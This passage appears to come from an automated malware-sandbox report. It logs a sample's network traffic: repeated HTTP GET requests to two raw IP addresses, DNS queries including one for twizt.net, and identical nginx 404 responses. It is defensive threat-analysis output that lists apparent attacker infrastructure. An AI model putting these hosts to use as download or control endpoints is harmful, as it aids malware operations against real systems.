                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global traffic | DNS traffic detected: DNS query: yahoo.com
                            Source: global traffic | DNS traffic detected: DNS query: mta7.am0.yahoodns.net
                            Source: global traffic | DNS traffic detected: DNS query: twizt.net
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:08 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:15 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:20 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
